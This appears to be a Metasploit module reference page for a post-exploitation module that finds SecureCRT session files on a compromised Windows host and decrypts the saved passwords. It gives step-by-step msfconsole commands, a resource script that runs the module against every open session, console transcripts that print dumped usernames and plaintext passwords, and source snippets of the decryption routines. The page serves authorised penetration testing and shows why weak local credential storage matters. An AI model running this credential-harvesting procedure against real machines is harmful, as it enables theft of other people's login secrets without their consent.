Windows SecureCRT Session Information Enumeration - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/securecrt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Source code: modules/post/windows/gather/credentials/securecrt.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will determine if SecureCRT is installed on the target system and, if it is, it will try to dump all saved session information from the target. The passwords for these saved sessions will then be decrypted where possible, using the decryption information that HyperSine reverse engineered. Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/securecrt

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/securecrt
msf post(securecrt) > show options
    ... show and set options ...
msf post(securecrt) > set SESSION session-id
msf post(securecrt) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/securecrt")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

All SecureCRT installations are affected, regardless of which OS they are installed on, since they all use the same encryption mechanisms described by HyperSine in his GitHub paper. Note that at the moment this module only supports exploiting Windows machines.

Overview

All versions of SecureCRT have an option to allow users to store an encrypted copy of their session information on the local computer, allowing them to easily restart a session without having to reenter all the connection details such as the host, username, and password. These details are stored in a local session file, and SecureCRT will additionally encrypt the password with AES encryption.

Unfortunately for SecureCRT users, the encryption mechanism used uses a weak IV of all 0's, and the encryption keys that are utilized to encrypt the passwords have been publicly reversed and documented by HyperSine in his GitHub paper.

In addition, HyperSine also published a PoC script that allows users to decrypt SecureCRT session files, regardless of the version of SecureCRT installed. The only limitation is that users must know the SecureCRT configuration password if one was set at installation. At the time of writing, September 11, 2020, it appears that Vandyke, the creators of SecureCRT, have still not changed the implementation details for this session encryption algorithm.

This module ports the work from HyperSine and implements it in a Metasploit module that allows users to easily retrieve any SecureCRT session files from a compromised Windows machine and then decrypt the session passwords where its possible to do so. All session information retrieved will be stored a Metasploit loot file, along with the password if it can be decrypted.

Setup Steps

  1. Download the latest installer of SecureCRT from https://www.vandyke.com/cgi-bin/releases.php?product=securecrt. You will need a valid login, which can be obtained by completing the registration form at https://www.vandyke.com/cgi-bin/download_application.php?pid=scrt_x64_873&force=1, after which an email will be sent to you with the valid login details.
  2. Follow the installer's prompts to install the software. Select all the default settings.
  3. Once everything has been installed, start SecureCRT. A prompt will appear asking if one wants to set a configuration passphrase to encrypt sensitive data such as saved passwords and login actions. Set a passphrase of your choice here, but be sure to remember it.
  4. Set up a SSH server on your target. For Windows 10 v1809 and later and Windows Server 2019 and later, this can be done by running the PowerShell command Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0, followed by Start-Service sshd.

Verification Steps

  1. Use SecureCRT to login to a SSH server of your choosing. When logging in, remember to select the check boxes to save the username (should be selected by default), as well as the checkbox to save the account password.
  2. Get a meterpreter session on the Windows host running SecureCRT.
  3. Do: run post/windows/gather/credentials/securecrt
  4. Optional: Run set PASSPHRASE *SecureCRT configuration passphrase* if a configuration passphrase was set for SecureCRT and you are aware of what its value is.
  5. If the session file was saved on the target, the module will print out the details of the host and port that the user connected to, as well as which username the user signed in with and the plaintext version of the password that was used.

Options

PASSPHRASE

The configuration password that was set when SecureCRT was installed, if one was supplied. Note that if this value is not supplied and SecureCRT was set up to use a configuration password, it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.

SESSION_PATH

The path to the SecureCRT session directory on the target's computer. By default this is normally stored at C:\\Users\\*current user name*\\AppData\\Roaming\\VanDyke\\Config\\Sessions if SecureCRT is installed on the system, however SecureCRT also has a portable version that stores the session information in a local folder along with the SecureCRT binary itself, allowing users to easily transfer their session information between machines. In this case, users can set the SESSION_PATH option to the location of the session directory within the portable folder to allow them to obtain SecureCRT session information even if a portable version of SecureCRT is utilized on the target.

Scenarios

Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled)

msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > info

       Name: Windows SecureCRT Session Information Enumeration
     Module: post/windows/gather/credentials/securecrt
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  HyperSine
  Kali-Team 

Compatible session types:
  Meterpreter

Basic options:
  Name        Current Setting   Required  Description
  ----        ---------------   --------  -----------
  PASSPHRASE                    no        The configuration password that was set when SecureCRT was installed, if one was supplied
  SESSION                       yes       The session to run this module on.

Description:
  This module will determine if SecureCRT is installed on the target
  system and, if it is, it will try to dump all saved session
  information from the target. The passwords for these saved sessions
  will then be decrypted where possible, using the decryption
  information that HyperSine reverse engineered. Note that whilst
  SecureCRT has installers for Linux, Mac and Windows, this module
  presently only works on Windows.

References:
  https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md

msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/securecrt) > set Passphrase whatabadpassword
Passphrase => whatabadpassword
msf6 post(windows/gather/credentials/securecrt) > run

[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
[*] Searching for session files in C:\Users\normal\AppData\Roaming\VanDyke\Config\Sessions
SecureCRT Sessions
==================

Filename           Protocol  Hostname   Port  Username              Password
--------           --------  --------   ----  --------              --------
127.0.0.1 (1).ini  telnet    127.0.0.1  23    RAPID7\Administrator  thePassword123!
127.0.0.1 (2).ini  ssh2      127.0.0.1  22    Administrator         thePassword123!
127.0.0.1 (3).ini  ssh2      127.0.0.1  22    Administrator
127.0.0.1.ini      telnet    127.0.0.1  23

msf6 post(windows/gather/credentials/securecrt) >

Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled, But No Password Provided)

msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > info

       Name: Windows SecureCRT Session Information Enumeration
     Module: post/windows/gather/credentials/securecrt
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  HyperSine
  Kali-Team 

Compatible session types:
  Meterpreter

Basic options:
  Name        Current Setting   Required  Description
  ----        ---------------   --------  -----------
  PASSPHRASE                    no        The configuration password that was set when SecureCRT was installed, if one was supplied
  SESSION                       yes       The session to run this module on.

Description:
  This module will determine if SecureCRT is installed on the target
  system and, if it is, it will try to dump all saved session
  information from the target. The passwords for these saved sessions
  will then be decrypted where possible, using the decryption
  information that HyperSine reverse engineered. Note that whilst
  SecureCRT has installers for Linux, Mac and Windows, this module
  presently only works on Windows.

References:
  https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md

msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/securecrt) > run

[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
[*] Searching for session files in C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
[-] It seems the user set a configuration password when installing SecureCRT!
[-] If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
SecureCRT Sessions
==================

Filename       Hostname   Port  Username              Password
--------       --------   ----  --------              --------
127.0.0.1.ini  127.0.0.1  22    RAPID7\Administrator

[+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125521_default_172.20.150.24_host.securecrt_s_951139.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/securecrt) >

Go back to menu.

Msfconsole Usage

Here is how the windows/gather/credentials/securecrt post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/securecrt

msf6 post(windows/gather/credentials/securecrt) > show info

       Name: Windows SecureCRT Session Information Enumeration
     Module: post/windows/gather/credentials/securecrt
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  HyperSine
  Kali-Team <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  PASSPHRASE                     no        The configuration password that was set when SecureCRT was installed, if one was supplied
  SESSION                        yes       The session to run this module on.
  SESSION_PATH                   no        Specifies the session directory path for SecureCRT

Description:
  This module will determine if SecureCRT is installed on the target 
  system and, if it is, it will try to dump all saved session 
  information from the target. The passwords for these saved sessions 
  will then be decrypted where possible, using the decryption 
  information that HyperSine reverse engineered. Note that whilst 
  SecureCRT has installers for Linux, Mac and Windows, this module 
  presently only works on Windows.

References:
  https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md

Module Options

This is a complete list of options available in the windows/gather/credentials/securecrt post exploitation module:

msf6 post(windows/gather/credentials/securecrt) > show options

Module options (post/windows/gather/credentials/securecrt):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSPHRASE                     no        The configuration password that was set when SecureCRT was installed, if one was supplied
   SESSION                        yes       The session to run this module on.
   SESSION_PATH                   no        Specifies the session directory path for SecureCRT

Advanced Options

Here is a complete list of advanced options supported by the windows/gather/credentials/securecrt post exploitation module:

msf6 post(windows/gather/credentials/securecrt) > show advanced

Module advanced options (post/windows/gather/credentials/securecrt):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/gather/credentials/securecrt module can do:

msf6 post(windows/gather/credentials/securecrt) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/gather/credentials/securecrt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/securecrt) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Couldn't find any session files at <PATH>

Here is a relevant code snippet related to the "Couldn't find any session files at <PATH>" error message:

68:	    config_ini = []
69:	    tbl = []
70:	    begin
71:	      print_status("Searching for session files in #{path}")
72:	      config_ini += session.fs.file.search(path, '*.ini')
73:	      fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.empty?
74:	    rescue Rex::Post::Meterpreter::RequestError
75:	      fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
76:	    end
77:	
78:	    # enum session file

The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist

Here is a relevant code snippet related to the "The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist" error message:

70:	    begin
71:	      print_status("Searching for session files in #{path}")
72:	      config_ini += session.fs.file.search(path, '*.ini')
73:	      fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.empty?
74:	    rescue Rex::Post::Meterpreter::RequestError
75:	      fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
76:	    end
77:	
78:	    # enum session file
79:	    config_ini.each do |item|
80:	      file_name = item['path'] + session.fs.file.separator + item['name']

It was not possible to decode one of the v1 passwords successfully, please double check the results!

Here is a relevant code snippet related to the "It was not possible to decode one of the v1 passwords successfully, please double check the results!" error message:

126:	    (0..padded_plain_bytes.length).step(2) do |i|
127:	      if (padded_plain_bytes[i] == "\x00" && padded_plain_bytes[i + 1] == "\x00")
128:	        return padded_plain_bytes[0..i - 1].force_encoding('UTF-16LE').encode('UTF-8')
129:	      end
130:	    end
131:	    print_warning('It was not possible to decode one of the v1 passwords successfully, please double check the results!')
132:	    return nil # We didn't decode the password successfully, so just return nil.
133:	  end
134:	
135:	  def securecrt_crypto_v2(ciphertext)
136:	    return nil if ciphertext.nil? || ciphertext.empty?

It seems the user set a configuration password when installing SecureCRT!

Here is a relevant code snippet related to the "It seems the user set a configuration password when installing SecureCRT!" error message:

149:	    plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length, 32]
150:	    if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
151:	      return plain_bytes.force_encoding('UTF-8')
152:	    end
153:	
154:	    print_warning('It seems the user set a configuration password when installing SecureCRT!')
155:	    print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
156:	    return nil
157:	  end
158:	
159:	  def securecrt_store_config(config)

If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.

Here is a relevant code snippet related to the "If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again." error message:

150:	    if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
151:	      return plain_bytes.force_encoding('UTF-8')
152:	    end
153:	
154:	    print_warning('It seems the user set a configuration password when installing SecureCRT!')
155:	    print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
156:	    return nil
157:	  end
158:	
159:	  def securecrt_store_config(config)
160:	    if config[:hostname].to_s.empty? || config[:service_name].to_s.empty? || config[:port].to_s.empty? || config[:username].to_s.empty? || config[:password].nil?

Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.

Here is a relevant code snippet related to the "Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target." error message:

194:	    else
195:	      securecrt_path = expand_path(datastore['SESSION_PATH'])
196:	    end
197:	
198:	    if securecrt_path.to_s.empty?
199:	      fail_with(Failure::NotFound, 'Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
200:	    else
201:	      result = enum_session_file(securecrt_path)
202:	      columns = [
203:	        'Filename',
204:	        'Protocol',

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • HyperSine
  • Kali-Team <kali-team[at]qq.com>

Version

This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.